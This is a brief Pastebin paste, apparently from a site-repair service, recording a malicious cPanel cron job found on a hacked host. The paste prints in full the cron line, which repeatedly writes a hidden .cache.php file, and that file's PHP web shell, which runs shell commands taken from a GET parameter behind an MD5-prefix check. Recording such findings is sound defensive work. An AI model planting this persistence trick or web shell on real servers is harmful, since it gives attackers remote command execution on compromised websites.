hackrepair

cPanel Cron Job Added - Hacked

Jul 11th, 2019
524
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. Found as cPanel Cron Job:
  2. */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /home/frugalc/public_html/.cache.php
  3.  
  4. Resulting file code:
  5. <?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>
Add Comment
Please, Sign In to add comment